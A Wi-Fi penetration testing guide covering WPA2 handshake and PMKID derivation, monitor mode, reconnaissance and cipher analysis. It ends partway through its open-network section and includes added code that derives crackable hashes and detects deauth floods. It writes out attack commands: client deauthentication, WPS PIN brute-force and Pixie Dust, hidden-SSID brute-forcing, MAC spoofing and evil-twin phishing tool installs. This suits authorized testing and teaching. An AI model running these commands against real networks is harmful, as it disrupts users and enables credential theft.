Wi-Fi Penetration Testing Guide
From Passive Analysis to Enterprise-Level Attacks
Legal Disclaimer: This guide is published for educational purposes and authorized security assessments only. Performing attacks on networks without explicit written authorization is illegal in most jurisdictions. Use these techniques exclusively on networks you own or in controlled lab environments.
Table of Contents
- 802.11 Fundamentals
- Hardware & Setup
- Monitor Mode & Preparation
- Reconnaissance
- Cipher & Traffic Analysis
- Open Networks (OPN) & OWE
- WEP — Legacy Protocol
- WPA2-PSK
- WPA3-SAE & Dragonblood
- Evil Twin & Evil Portal Attacks
- WPA2/3-Enterprise (MGT) — Reconnaissance
- WPA2/3-Enterprise (MGT) — Attacks
- Advanced Enterprise Attacks
- Post-Exploitation
- Detection & Defense (WIDS)
- Tool Reference
1. 802.11 Fundamentals
1.1 The IEEE 802.11 Standard
IEEE 802.11 is the family of standards governing wireless local area network (WLAN) communications. Transmission occurs over radio frequencies, primarily on:
| Band | Frequencies | Characteristics |
|---|---|---|
| 2.4 GHz | 2400–2483.5 MHz | Longer range, more interference, 14 channels (3 non-overlapping: 1, 6, 11) |
| 5 GHz | 5150–5850 MHz | Shorter range, less congested, more non-overlapping channels |
| 6 GHz | 5925–7125 MHz | Wi-Fi 6E/7, minimal congestion, 59+ non-overlapping channels |
1.2 Frame Types
802.11 frames are divided into three categories:
- Management Frames — control the association lifecycle (Beacon, Probe Request/Response, Authentication, Association, Deauthentication, Disassociation). Unless 802.11w (MFP) is active, these are unencrypted and unauthenticated.
- Control Frames — medium access control (ACK, RTS, CTS)
- Data Frames — carry actual payload (encrypted with session key)
Beacon Frame is broadcast periodically by the AP and contains:
- SSID (may be suppressed/hidden)
- BSSID (AP MAC address)
- Channel number
- Security capabilities (RSN/WPA Information Element)
- Supported cipher suites and AKM suites
- MFP capability flags
1.3 Security Protocol Evolution
WEP (1997) → WPA (2003) → WPA2 (2004) → WPA3 (2018) → WPA3-R2 (2022)
WEP: RC4/CRC32 [BROKEN]
WPA: TKIP/MIC [WEAK]
WPA2: AES-CCMP [Secure*]
WPA3: SAE/GCMP [Stronger]
WPA3-R2: Mandatory PMF [Current]
| Protocol | Cipher | Auth | Key Exchange | Status |
|---|---|---|---|---|
| WEP | RC4 | Open/Shared | Static | Broken — never use |
| WPA-TKIP | RC4+TKIP | PSK / 802.1X | PBKDF2 | Deprecated |
| WPA2-CCMP | AES-CCMP | PSK / 802.1X | PBKDF2 + 4-way | Vulnerable to offline dict |
| WPA3-SAE | AES-GCMP | SAE Dragonfly | DH on EC | Forward-secure |
| WPA3-Enterprise | AES-GCMP-256 | EAP + 192-bit | TLS-based | Current best |
| OWE | AES-CCMP | None | ECDH unauthenticated | No authentication |
1.4 The WPA2 4-Way Handshake
This is the core target for offline password attacks on WPA2-Personal:
Client (Supplicant) and AP (Authenticator) exchange four EAPOL-Key messages:
- M1 (AP → Client): ANonce. The AP sends a random ANonce.
- M2 (Client → AP): SNonce + MIC. The client sends its SNonce and proves PMK knowledge via the MIC.
- M3 (AP → Client): GTK + MIC. The AP sends the Group Transient Key.
- M4 (Client → AP): ACK. Handshake complete; encrypted data traffic follows.
Key derivation chain:
passphrase + SSID ──PBKDF2-SHA1(4096)──► PMK (256-bit)
PMK + ANonce + SNonce + MACs ──PRF-512──► PTK
PTK splits into: KCK (MIC validation) | KEK (key encryption) | TK (data encryption)
Capturing M1+M2 or M2+M3 is sufficient for an offline dictionary attack — no need to stay on the network.
PMKID (clientless variant):
PMKID = HMAC-SHA1-128(PMK, "PMK Name" || BSSID || Client_MAC)
Present in M1 (EAPOL frame from AP). Can be captured without any client association.
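The derivation chain above, implemented end to end as an added example (this is not code from the guide): PBKDF2 to PMK, PRF-512 to PTK and its KCK/KEK/TK split, the PMKID, and the hashcat 22000 record it ends up in. It shows why a captured PMKID or M1+M2 pair is enough for offline guessing: every step is deterministic from the passphrase, SSID and values sent in the clear. MACs and nonces are constructed samples.

```python
"""WPA2-Personal key-derivation chain (added example; not code from the guide).

passphrase + SSID --PBKDF2-SHA1(4096)--> PMK (256-bit)
PMK + ANonce + SNonce + MACs --PRF-512--> PTK = KCK | KEK | TK (| TKIP MIC keys)
PMKID = HMAC-SHA1-128(PMK, "PMK Name" || BSSID || Client_MAC)

Standard library only. MACs and nonces used in main() are constructed samples.
"""
import hashlib
import hmac
from typing import Dict


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def derive_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes,
               anonce: bytes, snonce: bytes) -> bytes:
    """IEEE 802.11 PRF-512: HMAC-SHA1 blocks over the label plus the
    min/max-ordered MACs and nonces, concatenated and cut to 64 bytes."""
    label = b"Pairwise key expansion"
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    blocks = b"".join(
        hmac.new(pmk, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)  # 4 x 20 bytes covers the 64 bytes needed
    )
    return blocks[:64]


def split_ptk(ptk: bytes) -> Dict[str, bytes]:
    """KCK (EAPOL MIC) | KEK (GTK wrapping) | TK (CCMP data key);
    the last 16 bytes are used only as TKIP MIC keys."""
    return {"KCK": ptk[0:16], "KEK": ptk[16:32], "TK": ptk[32:48],
            "TKIP_MIC": ptk[48:64]}


def derive_pmkid(pmk: bytes, ap_mac: bytes, sta_mac: bytes) -> bytes:
    """PMKID = first 128 bits of HMAC-SHA1(PMK, "PMK Name" || AA || SPA)."""
    return hmac.new(pmk, b"PMK Name" + ap_mac + sta_mac, hashlib.sha1).digest()[:16]


def hc22000_pmkid_line(pmkid: bytes, ap_mac: bytes, sta_mac: bytes, ssid: str) -> str:
    """hashcat 22000 PMKID record: WPA*01*PMKID*MAC_AP*MAC_STA*ESSID_HEX***
    (the three trailing fields stay empty for PMKID records)."""
    return (f"WPA*01*{pmkid.hex()}*{ap_mac.hex()}*{sta_mac.hex()}"
            f"*{ssid.encode().hex()}***")


def main() -> None:
    # Constructed sample values, not taken from a real network.
    ssid, passphrase = "corp-wifi", "password"
    ap_mac = bytes.fromhex("f09fc2712212")
    sta_mac = bytes.fromhex("78c1a7bf7246")
    anonce, snonce = bytes(range(32)), bytes(range(32, 64))

    pmk = derive_pmk(passphrase, ssid)
    parts = split_ptk(derive_ptk(pmk, ap_mac, sta_mac, anonce, snonce))
    pmkid = derive_pmkid(pmk, ap_mac, sta_mac)
    print("PMK     ", pmk.hex())
    for name, key in parts.items():
        print(f"{name:<8}", key.hex())
    print("PMKID   ", pmkid.hex())
    print(hc22000_pmkid_line(pmkid, ap_mac, sta_mac, ssid))


if __name__ == "__main__":
    main()
```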
1.5 WPA3-SAE (Dragonfly Handshake)
SAE uses an elliptic curve Diffie-Hellman variant called Dragonfly:
- Commit (Client → AP and AP → Client): each side sends a (scalar, element) pair; both derive the shared secret independently
- Confirm (Client → AP and AP → Client): each side sends a verifier; mutual authentication
- PMK derived, proceed to the 4-way handshake
Key differences from WPA2:
- No capturable hash for offline cracking — every attempt requires network interaction
- Forward secrecy: each session uses unique ephemeral keys
- Simultaneous authentication: both sides prove knowledge of the password equally
1.6 WPA2/3-Enterprise (802.1X / EAP)
Enterprise networks use a RADIUS server and EAP for per-user authentication:
- Client → AP: EAP Start
- AP → Client: EAP Identity Request
- Client → AP: EAP Identity Response; AP → RADIUS server: Access-Request (identity relayed)
- RADIUS server → AP: Access-Challenge; AP → Client: EAP Challenge
- Client → AP: EAP Response; AP → RADIUS server: relayed
- RADIUS server → AP: Access-Accept; AP → Client: EAP-Success
Common EAP Methods:
| Method | Inner Auth | TLS Tunnel | Server Cert Verified | Attack Surface |
|---|---|---|---|---|
| EAP-TLS | Certificate | Yes | Yes (client cert too) | Requires stolen cert |
| PEAP/MSCHAPv2 | Password | Yes | Only if configured | Rogue AP → MSCHAPv2 hash |
| EAP-TTLS/PAP | Password | Yes | Only if configured | Rogue AP → cleartext password |
| EAP-MD5 | Password | None | No | Trivially crackable |
| LEAP (Cisco) | Password | None | No | Dictionary attack |
MSCHAPv2 is the most common inner authentication in enterprise environments. If the client does not validate the server certificate, a Rogue AP captures the challenge-response pair, which can be cracked offline with hashcat mode 5500/5600.
2. Hardware & Setup
2.1 Wi-Fi Adapter Requirements
For Wi-Fi penetration testing you need an adapter with:
- Monitor mode — receive all frames regardless of destination MAC
- Packet injection — inject arbitrary 802.11 frames into the air
Most built-in laptop cards do not support these. External USB adapters are required.
Recommended chipsets (2024/2025):
| Adapter | Chipset | Bands | Notes |
|---|---|---|---|
| Alfa AWUS036ACM | MT7612U | 2.4/5 GHz | Rock-solid in-kernel driver, best all-round |
| Alfa AWUS036AXML | MT7921AU | 2.4/5/6 GHz | Wi-Fi 6E support, modern |
| Alfa AWUS036ACH | RTL8812AU | 2.4/5 GHz | Requires external driver (aircrack-ng/rtl8812au) |
| Alfa AWUS036ACHM | MT7610U | 2.4/5 GHz | Stable, good injection |
| Panda PAU09 | RT5572 | 2.4/5 GHz | Budget option, stable |
| TP-Link Archer T4U | RTL8812AU | 2.4/5 GHz | Common, needs external driver |
Test injection capability:
sudo aireplay-ng --test wlan0
# Output should show: Injection is working!
2.2 Essential Tool Installation
# Core suite
sudo apt update && sudo apt install -y \
aircrack-ng \
hashcat \
hcxtools \
hcxdumptool \
wireshark \
tshark \
mdk4 \
hostapd \
dnsmasq \
macchanger \
arp-scan \
net-tools \
iw \
wireless-tools \
python3-pip \
libssl-dev \
pkg-config
# wifiphisher — automated Evil Twin + captive portal phishing
git clone https://github.com/wifiphisher/wifiphisher.git
cd wifiphisher && sudo python3 setup.py install
# fluxion — Evil Twin framework with captive portal
git clone https://github.com/FluxionNetwork/fluxion.git
cd fluxion && sudo bash fluxion.sh --install
# eaphammer — Enterprise Evil Twin (EAP credential harvesting)
git clone https://github.com/s0lst1c3/eaphammer.git
cd eaphammer && sudo bash kali-setup.sh
# hostapd-mana — Rogue AP with PSK capture
sudo apt install -y hostapd-mana
# berate_ap — Advanced Rogue AP for relay attacks
git clone https://github.com/sensepost/berate_ap.git
# wpa_sycophant — MSCHAPv2 relay
git clone https://github.com/sensepost/wpa_sycophant.git
# wacker — WPA3-SAE online brute-force
git clone https://github.com/blunderbuss-wctf/wacker.git
cd wacker && pip3 install -r requirements.txt
# air-hammer — Enterprise brute-force / password spray
git clone https://github.com/Wh1t3Rh1n0/air-hammer.git
# EAP_buster — EAP method enumeration
git clone https://github.com/rek7/EAP_buster.git
# wifi_db — capture aggregation and analysis
git clone https://github.com/r4ulcl/wifi_db.git
pip3 install -r wifi_db/requirements.txt
2.3 Adapter Verification
# List wireless interfaces
iw dev
# Check capabilities (monitor mode, injection)
iw phy phy0 info | grep -E "monitor|\* 2484"   # monitor = mode supported; 2484 MHz = channel 14 listed
# Identify chipset via USB
lsusb
# Kernel messages about the adapter
dmesg | grep -iE "wlan|802.11|wireless" | tail -20
# Driver information
ethtool -i wlan0 2>/dev/null | grep driver
3. Monitor Mode & Preparation
3.1 What Monitor Mode Does
In managed mode the adapter only processes frames addressed to its MAC. In monitor mode it captures every frame in range: beacons, probe requests, data frames, management frames — from all networks simultaneously on the tuned channel.
3.2 Enabling Monitor Mode
Method 1 — airmon-ng (recommended for aircrack-ng suite):
# Kill processes that hold the wireless interface
sudo airmon-ng check kill
# Create monitor interface
sudo airmon-ng start wlan0
# New interface: wlan0mon
# Verify
iwconfig wlan0mon
# Should show: Mode:Monitor
Method 2 — iw (manual control, more precise):
sudo ip link set wlan0 down
sudo iw dev wlan0 set type monitor
sudo ip link set wlan0 up
iwconfig wlan0
Lock to a specific channel:
sudo iwconfig wlan0mon channel 6
# or
sudo iw dev wlan0mon set channel 6 HT20
Disabling monitor mode:
sudo airmon-ng stop wlan0mon
sudo systemctl start NetworkManager
3.3 MAC Address Management
sudo systemctl stop NetworkManager
sudo ip link set wlan1 down
# Show current MAC
macchanger --show wlan1
# Random vendor-compliant MAC
sudo macchanger -r wlan1
# Set specific MAC (e.g., impersonate a client)
sudo macchanger -m AA:BB:CC:DD:EE:FF wlan1
# Restore permanent hardware MAC
sudo macchanger -p wlan1
sudo ip link set wlan1 up
3.4 Project Workspace
mkdir -p ~/wifi/{captures,hashes,certs,logs,configs,wordlists}
cd ~/wifi
4. Reconnaissance
4.1 Goals
Reconnaissance is the foundation of every Wi-Fi assessment. Before any active attack, you need:
- Complete map of APs in range: SSID, BSSID, channel, security type, cipher, AKM
- List of associated clients and their MAC addresses
- Probe Requests from clients (reveal networks they have previously connected to)
- Hidden SSID discovery
- Vendor identification (can hint at default credentials)
- WPS status (potential attack vector)
- Signal strength and physical positioning of targets
4.2 Passive Scanning with airodump-ng
# Full multi-band scan (save captures for later analysis)
sudo airodump-ng wlan0mon \
-w ~/wifi/captures/scan \
--output-format pcap,csv \
--manufacturer \
--wps \
--band abg
# Focus on a specific channel (more data on that channel)
sudo airodump-ng wlan0mon \
-c 6 \
--bssid <TARGET_BSSID> \
-w ~/wifi/captures/target_ch6 \
--manufacturer --wps
# 5 GHz only
sudo airodump-ng wlan0mon \
-w ~/wifi/captures/scan5 \
--manufacturer --wps \
--band a
Reading airodump-ng output:
BSSID PWR Beacons #Data CH MB ENC CIPHER AUTH ESSID
F0:9F:C2:71:22:12 -42 145 523 6 54e WPA2 CCMP PSK corp-wifi
F0:9F:C2:6A:88:26 -67 89 0 11 54e WPA2 CCMP PSK <length: 0>
AA:BB:CC:DD:EE:01 -55 34 0 6 54e WPA3 CCMP SAE home-net
BB:CC:DD:EE:FF:02 -71 21 5 1 54e OPN OPN free-wifi
BSSID STATION PWR Rate Lost Frames Probe
F0:9F:C2:71:22:12 78:C1:A7:BF:72:46 -55 54-11 0 234 office-backup,home-wifi
(not associated) AA:BB:CC:11:22:33 -60 0- 1 0 12 starbucks,airport-free
Key fields:
- #Data: data frames captured; a high count means an active client (good target for injection)
- ESSID <length: 0>: hidden SSID; the length reveals the character count
- Probe: networks the client has previously connected to (attack surface for Evil Twin)
- ENC OPN: open/unencrypted network
4.3 Hidden SSID Discovery
Method 1 — Wait for a natural client reconnection (completely passive):
# Keep airodump-ng running; when a client connects, the Probe Response reveals the SSID
sudo airodump-ng wlan0mon --band abg -w ~/wifi/captures/passive
Method 2 — Active deauthentication of an associated client:
# Kick a client off the AP; its Probe Request during reconnect reveals the SSID
sudo aireplay-ng -0 5 -a <AP_BSSID> -c <CLIENT_MAC> wlan0mon
Method 3 — ESSID brute-force with mdk4:
# Build a targeted wordlist
# $0 keeps the whole line, so candidates containing spaces survive
awk '{print "corp-" $0}' /usr/share/wordlists/rockyou.txt \
> ~/wifi/wordlists/prefixed.txt
# Fix the monitor interface on the target channel first
sudo iwconfig wlan0mon channel 11
# Probe each SSID until the AP responds
sudo mdk4 wlan0mon p \
-t <AP_BSSID> \
-f ~/wifi/wordlists/prefixed.txt
4.4 WPS Enumeration
# Identify WPS-enabled APs
sudo wash -i wlan0mon --scan
# WPS PIN brute-force (slow, rate-limited by most modern APs)
sudo reaver -i wlan0mon -b <BSSID> -vv -N
# Pixie Dust attack (offline; works on specific chipsets: Ralink, Realtek, Broadcom older FW)
sudo reaver -i wlan0mon -b <BSSID> -vv -K 1
# Bully as an alternative
sudo bully wlan0mon -b <BSSID> -d -v 3
4.5 Aggregated Analysis with wifi_db
cd ~/tools/wifi_db
# Import all captures into a SQLite database
python3 wifi_db.py -d ~/wifi/analysis.sqlite ~/wifi/captures/
# GUI browser
sqlitebrowser ~/wifi/analysis.sqlite
# Useful queries via CLI
sqlite3 ~/wifi/analysis.sqlite \
"SELECT ESSID, BSSID, Channel, Security, Cipher FROM APs ORDER BY Power DESC;"
sqlite3 ~/wifi/analysis.sqlite \
"SELECT Station, BSSID, Probe FROM Clients WHERE Probe != '' ORDER BY Probe;"
5. Cipher & Traffic Analysis
5.1 Why Cipher Analysis Matters
Before launching any attack, understanding what cipher suites are negotiated tells you:
- Which cryptographic algorithms protect the traffic (TKIP is weak, CCMP/GCMP are strong)
- Whether Management Frame Protection (MFP / 802.11w) is required — blocks deauthentication attacks
- The exact AKM suite (PSK, SAE, EAP, OWE) — determines which attacks are applicable
- Whether PMKID is likely to be present in EAPOL M1 frames
- Whether downgrade from WPA3 to WPA2 is feasible (transition mode)
5.2 Reading the RSN Information Element
Every WPA2/WPA3 beacon contains a Robust Security Network (RSN) IE that advertises supported cipher and AKM suites. You can extract it passively:
With Wireshark:
Filter: wlan.fc.type_subtype == 8 && wlan.ssid == "TARGET_SSID"
Expand: IEEE 802.11 wireless LAN → Tagged parameters → RSN Information
Fields to examine:
RSN Information
├── Version: 1
├── Group Cipher Suite: 00-0f-ac-4 (CCMP-128) or 00-0f-ac-2 (TKIP)
├── Pairwise Cipher Suites
│ ├── 00-0f-ac-4 → CCMP-128 (WPA2 standard)
│ ├── 00-0f-ac-8 → GCMP-128 (WPA3)
│ ├── 00-0f-ac-9 → GCMP-256 (WPA3-Enterprise 192-bit)
│ └── 00-0f-ac-2 → TKIP (legacy, weak)
├── AKM Suite List
│ ├── 00-0f-ac-2 → PSK (WPA2-Personal)
│ ├── 00-0f-ac-8 → SAE (WPA3-Personal)
│ ├── 00-0f-ac-18 → OWE (Enhanced Open)
│ └── 00-0f-ac-1 → 802.1X (Enterprise)
└── RSN Capabilities
├── Pre-Auth: 0
├── No Pairwise: 0
├── PTKSA Replay Counter: 3
├── GTKSA Replay Counter: 3
├── MFP Required: [0=off / 1=mandatory] ← KEY: if 1, deauth attacks FAIL
└── MFP Capable: [0=off / 1=supported]
With tshark (batch extraction):
# Extract RSN info from all beacons in a capture
tshark -r ~/wifi/captures/scan-01.cap \
-Y "wlan.fc.type_subtype == 8" \
-T fields \
-e wlan.ssid \
-e wlan.rsn.pcs.list \
-e wlan.rsn.akms.list \
-e wlan.rsn.capabilities \
2>/dev/null | sort -u
# Check MFP status for a specific BSSID
tshark -r ~/wifi/captures/scan-01.cap \
-Y "wlan.bssid == <BSSID> && wlan.fc.type_subtype == 8" \
-T fields \
-e wlan.ssid \
-e wlan.rsn.capabilities.mfpr \
-e wlan.rsn.capabilities.mfpc \
2>/dev/null
# mfpr=1 means deauth attacks are BLOCKED (802.11w mandatory)
Check transition mode (WPA2 + WPA3 simultaneously):
# If an AP supports both PSK (AKM 2) and SAE (AKM 8), it's in transition mode
# → downgrade to WPA2 is possible
tshark -r ~/wifi/captures/scan-01.cap \
-Y "wlan.bssid == <BSSID> && wlan.fc.type_subtype == 8" \
-T fields -e wlan.rsn.akms.list 2>/dev/null
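The same decoding done on raw IE bytes, as an added example that is not part of the guide: a parser for the RSN IE body (tag 48, after the length byte) that names the suites from the tables above and reports the two decisions this section is about, whether MFP is required and whether the AP advertises both PSK and SAE (transition mode). The three sample IEs are constructed by hand, not taken from a capture.

```python
"""RSN Information Element parser (added example; not code from the guide).

Input is the IE body after tag number 48 and the length byte. Output names
group/pairwise ciphers and AKMs and decodes the RSN Capabilities bits the
tree above lists. Sample IEs below are constructed, not captured.
"""
import struct
from typing import Dict, List, Tuple

IEEE_OUI = b"\x00\x0f\xac"
CIPHER_SUITES = {1: "WEP-40", 2: "TKIP", 4: "CCMP-128", 5: "WEP-104",
                 8: "GCMP-128", 9: "GCMP-256", 10: "CCMP-256"}
AKM_SUITES = {1: "802.1X", 2: "PSK", 3: "FT-802.1X", 4: "FT-PSK",
              5: "802.1X-SHA256", 6: "PSK-SHA256", 8: "SAE", 9: "FT-SAE",
              18: "OWE"}
WEAK_CIPHERS = {"WEP-40", "WEP-104", "TKIP"}


def _suite(raw: bytes, table: Dict[int, str]) -> str:
    """Render one 4-byte selector as a name, e.g. 00-0f-ac-4 -> CCMP-128."""
    oui, kind = raw[:3], raw[3]
    if oui != IEEE_OUI:
        return f"vendor-{oui.hex()}-{kind}"
    return table.get(kind, f"unknown-{kind}")


def _suite_list(body: bytes, off: int, table: Dict[int, str]) -> Tuple[List[str], int]:
    """Read a little-endian count followed by that many 4-byte selectors."""
    (count,) = struct.unpack_from("<H", body, off)
    off += 2
    names = [_suite(body[off + 4 * i: off + 4 * i + 4], table) for i in range(count)]
    return names, off + 4 * count


def parse_rsn_ie(body: bytes) -> dict:
    """Decode version, group/pairwise ciphers, AKMs and RSN Capabilities."""
    (version,) = struct.unpack_from("<H", body, 0)
    group = _suite(body[2:6], CIPHER_SUITES)
    pairwise, off = _suite_list(body, 6, CIPHER_SUITES)
    akms, off = _suite_list(body, off, AKM_SUITES)
    # RSN Capabilities are optional; when absent every bit is zero.
    caps = struct.unpack_from("<H", body, off)[0] if len(body) >= off + 2 else 0
    return {
        "version": version,
        "group_cipher": group,
        "pairwise_ciphers": pairwise,
        "akms": akms,
        "preauth": bool(caps & 0x0001),
        "no_pairwise": bool(caps & 0x0002),
        "ptksa_replay_counters": (caps >> 2) & 0x3,
        "gtksa_replay_counters": (caps >> 4) & 0x3,
        "mfp_required": bool(caps & 0x0040),  # bit 6: MFPR
        "mfp_capable": bool(caps & 0x0080),   # bit 7: MFPC
    }


def assess(rsn: dict) -> List[str]:
    """Turn the decoded IE into the findings an assessor records."""
    findings = []
    weak = WEAK_CIPHERS & set(rsn["pairwise_ciphers"] + [rsn["group_cipher"]])
    if weak:
        findings.append("weak cipher advertised: " + ", ".join(sorted(weak)))
    if "PSK" in rsn["akms"] and "SAE" in rsn["akms"]:
        findings.append("WPA2/WPA3 transition mode: WPA2-PSK downgrade possible")
    if rsn["mfp_required"]:
        findings.append("MFP required: unauthenticated deauth/disassoc are ignored")
    elif rsn["mfp_capable"]:
        findings.append("MFP optional: legacy clients remain deauthable")
    else:
        findings.append("MFP off: deauth-based attacks are not blocked")
    return findings


# Constructed sample IE bodies (tag 48 and length byte already stripped).
TRANSITION_IE = bytes.fromhex(
    "0100" "000fac04" "0100" "000fac04" "0200" "000fac02" "000fac08" "bc00")
SAE_ONLY_IE = bytes.fromhex(
    "0100" "000fac04" "0100" "000fac04" "0100" "000fac08" "fc00")
LEGACY_MIXED_IE = bytes.fromhex(
    "0100" "000fac02" "0200" "000fac02" "000fac04" "0100" "000fac02" "0c00")

if __name__ == "__main__":
    for name, ie in [("transition", TRANSITION_IE), ("sae-only", SAE_ONLY_IE),
                     ("legacy", LEGACY_MIXED_IE)]:
        rsn = parse_rsn_ie(ie)
        print(name, rsn["akms"], rsn["pairwise_ciphers"], assess(rsn))
```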
5.3 Cipher Suite Summary Table
| OUI-Suite | Cipher | Protocol | Security Level |
|---|---|---|---|
| 00-0f-ac-1 | WEP-40 | WEP | Broken |
| 00-0f-ac-2 | TKIP | WPA | Weak |
| 00-0f-ac-4 | CCMP-128 (AES) | WPA2 | Good |
| 00-0f-ac-8 | GCMP-128 | WPA3 | Strong |
| 00-0f-ac-9 | GCMP-256 | WPA3-Ent 192-bit | Very Strong |
| 00-0f-ac-10 | CCMP-256 | WPA3 | Strong |
AKM Suite OUI:
| OUI-Suite | Key Management | Protocol |
|---|---|---|
| 00-0f-ac-1 | 802.1X (EAP) | WPA2-Enterprise |
| 00-0f-ac-2 | PSK | WPA2-Personal |
| 00-0f-ac-8 | SAE | WPA3-Personal |
| 00-0f-ac-18 | OWE | Enhanced Open |
| 00-0f-ac-13 | 802.1X Suite-B | WPA3-Enterprise |
5.4 Decrypting WPA2 Traffic in Wireshark
If you have captured the 4-way handshake and know the passphrase, Wireshark can decrypt the session in real time:
Edit → Preferences → Protocols → IEEE 802.11
[x] Enable decryption
Decryption Keys → Edit → [+]
Key type: wpa-pwd
Key: YourPassphrase:SSID_Name
Or use wpa-psk with the pre-computed PMK (hex):
# Compute PMK from passphrase+SSID
wpa_passphrase "SSID_NAME" "passphrase" | grep psk
# Copy the hex value as wpa-psk in Wireshark
With tshark (command line):
# Decrypt inline using passphrase
tshark -r ~/wifi/captures/target-01.cap \
-o "wlan.enable_decryption:TRUE" \
-o "uat:80211_keys:\"wpa-pwd\",\"passphrase:SSID\"" \
-Y "http || dns || ftp" \
-T fields -e frame.time -e ip.src -e ip.dst -e http.host -e dns.qry.name \
2>/dev/null
# Decrypt with raw PMK
tshark -r ~/wifi/captures/target-01.cap \
-o "wlan.enable_decryption:TRUE" \
-o "uat:80211_keys:\"wpa-psk\",\"PMK_HEX_STRING\"" \
-Y "http" 2>/dev/null
With airdecap-ng:
# Generates a new *-dec.cap file with decrypted frames
airdecap-ng \
-e "SSID_NAME" \
-p "passphrase" \
~/wifi/captures/target-01.cap
# For WEP
airdecap-ng -w <WEP_KEY_HEX> ~/wifi/captures/wep-01.cap
# Open the decrypted capture
wireshark ~/wifi/captures/target-01-dec.cap
5.5 Identifying EAPOL Frames and Handshake Quality
# Count EAPOL frames per BSSID (each complete handshake = 4 frames)
tshark -r ~/wifi/captures/target-01.cap \
-Y "eapol" \
-T fields -e wlan.bssid -e eapol.keydes.type \
2>/dev/null | sort | uniq -c
# Validate handshake quality with aircrack-ng
aircrack-ng ~/wifi/captures/target-01.cap
# Look for: "1 handshake" in the AP list
# "No valid WPA handshakes found" = capture is incomplete
# Check if PMKID is present in the capture
hcxpcapngtool ~/wifi/captures/target-01.cap -o /dev/null --info=stdout 2>/dev/null | \
grep -E "PMKID|EAPOL"
5.6 Extracting EAP Certificates from Captures
Enterprise APs transmit their TLS certificate in cleartext during authentication:
# Extract all TLS certificate fields from a capture (via tshark)
tshark -r ~/wifi/captures/mgt-01.cap \
-Y "tls.handshake.type == 11" \
-T fields \
-e x509sat.uTF8String \
-e x509sat.IA5String \
-e x509ce.dNSName \
2>/dev/null | sort -u
# Wireshark filter for certificate exchange
# (wlan.sa == <AP_BSSID>) && (tls.handshake.certificate)
# Extract Subject/Issuer fields
tshark -r ~/wifi/captures/mgt-01.cap \
-Y "wlan.bssid == <BSSID> && x509sat.IA5String" \
-T fields -e x509sat.IA5String 2>/dev/null
5.7 Detecting Deauthentication Attacks in Captures
# Count deauth frames by source (high count = active attack in progress)
tshark -r ~/wifi/captures/scan-01.cap \
-Y "wlan.fc.type_subtype == 12 || wlan.fc.type_subtype == 10" \
-T fields -e wlan.sa -e wlan.da -e wlan.fc.type_subtype \
2>/dev/null | sort | uniq -c | sort -rn | head -20
# Filter for broadcast deauth (affects all clients)
tshark -r ~/wifi/captures/scan-01.cap \
-Y "wlan.fc.type_subtype == 12 && wlan.da == ff:ff:ff:ff:ff:ff" \
2>/dev/null
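A small detector that consumes the tshark field output from the commands above (added example, not code from the guide): it reads tab-separated records of frame time, source, destination and subtype, and flags any source that sends more than a threshold of deauth/disassoc frames within a sliding window, noting whether it targets the broadcast address. The sample records are constructed.

```python
"""Deauth/disassoc flood detector (added example; not code from the guide).

Consumes tab-separated records in the shape produced by
  tshark -T fields -e frame.time_epoch -e wlan.sa -e wlan.da -e wlan.fc.type_subtype
and flags every source that sends THRESHOLD or more deauth/disassoc frames
inside a sliding WINDOW of seconds. The sample records are constructed.
"""
from collections import defaultdict, deque
from typing import Deque, Dict, List, Tuple

DEAUTH = 0x0C
DISASSOC = 0x0A
BROADCAST = "ff:ff:ff:ff:ff:ff"

Record = Tuple[float, str, str, int]


def parse_record(line: str) -> Record:
    """time, source, destination, subtype; subtype may be '12' or '0x000c'."""
    t, sa, da, subtype = line.rstrip("\n").split("\t")
    return float(t), sa.lower(), da.lower(), int(subtype, 0)


def detect_floods(records: List[Record], window: float = 1.0,
                  threshold: int = 5) -> Dict[str, dict]:
    """Return {source_mac: summary} for every source exceeding the rate."""
    recent: Dict[str, Deque[float]] = defaultdict(deque)
    alerts: Dict[str, dict] = {}
    for t, sa, da, subtype in sorted(records):
        if subtype not in (DEAUTH, DISASSOC):
            continue
        q = recent[sa]
        q.append(t)
        while q and t - q[0] > window:  # drop frames that left the window
            q.popleft()
        if len(q) >= threshold:
            a = alerts.setdefault(sa, {"first_seen": q[0], "peak_rate": 0,
                                       "broadcast": False, "targets": set()})
            a["peak_rate"] = max(a["peak_rate"], len(q))
            a["last_seen"] = t
            a["targets"].add(da)
            a["broadcast"] = a["broadcast"] or da == BROADCAST
    return alerts


# Constructed sample: one source sends 8 broadcast deauths within 0.35 s,
# the AP itself sends a single disassoc and a beacon (normal housekeeping).
SAMPLE_LINES = [
    f"1700000000.{ms:03d}\taa:bb:cc:dd:ee:01\tff:ff:ff:ff:ff:ff\t0x000c"
    for ms in range(0, 400, 50)
] + [
    "1700000003.000\tf0:9f:c2:71:22:12\t78:c1:a7:bf:72:46\t0x000a",
    "1700000003.200\tf0:9f:c2:71:22:12\tff:ff:ff:ff:ff:ff\t0x0008",
]


def main() -> None:
    alerts = detect_floods([parse_record(line) for line in SAMPLE_LINES])
    for sa, a in alerts.items():
        kind = "broadcast" if a["broadcast"] else "targeted"
        print(f"ALERT {sa}: {a['peak_rate']} deauth/disassoc frames in one window "
              f"({kind}), targets={sorted(a['targets'])}")


if __name__ == "__main__":
    main()
```

Replace `SAMPLE_LINES` with the lines of a real tshark run (add `-e frame.time_epoch` as the first field) to run it over a capture.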
6. Open Networks (OPN) & OWE
6.1 Theory
OPN (Open): No encryption, no authentication. All frames are transmitted in cleartext. Anyone within radio range can capture all traffic passively.
OWE (Opportunistic Wireless Encryption / “Enhanced Open”): WPA3 enhancement that provides per-client encryption on open networks via unauthenticated ECDH. Protects against passive eavesdropping but does not authenticate the AP — still vulnerable to Evil Twin.
Attack surface on OPN:
- Passive traffic interception
- HTTP session hijacking (cookie theft)
- Captive portal bypass via MAC spoofing
- DNS poisoning
6.2 Connecting to an Open Network
cat > ~/wifi/configs/open.conf << 'EOF'
network={
ssid="TARGET_SSID"
key_mgmt=NONE
}
EOF
sudo wpa_supplicant -Dnl80211 -iwlan2 -c ~/wifi/configs/open.conf -B
